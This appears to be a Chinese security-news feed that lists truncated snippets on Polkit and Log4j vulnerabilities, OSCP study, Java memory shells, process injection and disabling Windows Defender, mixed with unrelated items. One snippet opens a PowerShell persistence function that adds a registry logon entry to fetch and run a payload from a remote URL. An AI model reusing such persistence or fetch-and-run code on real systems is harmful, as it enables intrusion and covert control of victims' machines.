在大多数的思维里总觉得学习网络安全得先收集资料、学习编程、学习计算机基础，自学那么久，看了那么多视频，还是挖不到漏洞，无法拿出自己最得意的作品。 我整理了以前很多收藏过的储备内容...

CVE-2021-4034 Linux Polkit 权限提升漏洞分析https://cn.4xpl0r3r.com/漏洞分析/CVE-2021-4034-Linux-Polkit-权限提升漏洞分析/ 本文主要参考官方的Advisory来进行分析 漏洞简介 2022-01-25...

OSCE3之路 - OSCP | PEN200https://cn.4xpl0r3r.com/证书/OSCE3之路-OSCP-PEN200/ 在2022年1月我拿到了OSCE3(也许是大陆第一个？)，我在参与PEN200-OSCP时使用的是2020年更新的新版教材(含域...

https://cn.4xpl0r3r.com/技术归纳/JavaWeb-内存马技术归纳/ 本文以Tomcat 9为核心学习并归纳了一些内存马技术，除有特殊说明外的章节外，本文使用Java 8u292 首先我们整理一下几种植入内存马...

2016年4月，习总书记在网络安全和信息化工作座谈会上发表重要讲话，习总书记指出，“网络安全的本质是对抗，对抗的本质是两端能力的较量”。同年，国家有关部门组织开展了全国性网络安全实战...

免责声明 本工具只出于技术分享学习为目的，请不要用于非法用途。如您在使用本工具的过程中存在任何非法行为，您将自行承担所有后果，本工具所有开发者和所有贡献者不承担任何法律及连带责任...

工具里用到的原理，大部分都可以通过下文找到： 子域名枚举&收集 代码分析版本为：OneForAll v0.4.3 OneForAll目录结构： 参考来源./docs/directory_structure.md D:. | .gitignore | .travi...

信创产品参考： https://pkeurrb3v6.feishu.cn/file/boxcnsC9OoN65iMBZ78PSme1dad 重要应用列表参考： https://poc.shuziguanxing.com/#/activityInfo#8 活动地址： https://fp.shuziguanxi...

强烈推荐以下安全技术类公众号，内容涵盖SRC漏洞挖掘、漏洞预警、安全武工具推荐、红蓝对抗、渗透实战、漏洞分析、安全工具、代码审计等干货，你绝对用的上。排名不分先后。 亿人安全 主要研...

公司: Microsoft Corporation 产品名称: Microsoft® Windows® Operating System 文件版本: 6.0.6000.16386 文件大小: 83.5KB 文件路径:C:\Windows\System32\colorcpl.exe 文件描述:Micros...

项目介绍 团队支撑的第一部剧情短片《放滩》创作资金众筹。这是一部正在制作当中的小成本文艺片。如果您愿意，希望可以耐心往下看，非常感谢。 1、故事梗概 短片《放滩》以千禧年为时代背景，...

大家好，我是产教中心小编，今天由我来给大家分享一个故事： 一个阳光明媚的下午，退休在家无所事事的老王正在网上冲浪，网页上突然弹出“XX小游戏快速体验”的广告弹窗。 老王尝试点击关闭，...

2022互联网寒冬传言纷纷扰扰，大厂裁员消息层出不穷，很多人还没来得及享受互联网红利，就在这些信息的冲击下开始退缩了...... 现状真的是这样吗？其实不然。目前招聘网站上仍有一类招聘岗位...

认识深信服 成立时间：2000年12月 公司人数：7000+人 研发人员占比：40%+ 研发投入：20%*销售收入 研究所：6个（深圳、北京、硅谷、长沙、南京、成都） 专注领域：3大领域（云计算、网络安全...

#>#使用Unicorn生成已编码的powershell命令。修改注册表,当用户登录时执行payloadfunction Add-Persistence(){#payload的路径$payloadurl = "http://192.168.125.106:8000/ghu98hjbs7jhj2" ...

为进一步展示深圳市网络与信息安全技术服务能力，全面宣传网络与信息安全行业技术服务单位及其产品，促进产业发展，服务深圳市网络空间安全建设，深圳市网络与信息安全行业协会（简称“协会”...

前言 比较常见的进程注入是：CreateRemoteThread。 主要过程为： 1.VirtualAllocEx -> 分配内存空间来暂存 shellcode 2 .WriteProcessMemory -> 将解密/解码的shellcode写入内存空间 3 .Cre...

近期网络安全圈讨论最多的话题，莫过于Apache Log4j。 由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。Apache Struts2、Apache Solr、Apach...

奥运史上首次公开招募白帽黑客共同守护冬奥网络安全。12月16日，北京冬奥组委技术部组织招募白帽黑客作为“冬奥网络安全卫士”参与北京冬奥会网络安全工作，由北京2022年冬奥会官方赞助商奇安...

描述 可以关闭Windows Defender服务并通过提升权限删除ppl保护，然后删除Windows Defender中的DLL和其他文件，使Windows Defender服务无法运行，从而导致Windows Defender拒绝服务。 攻击步骤...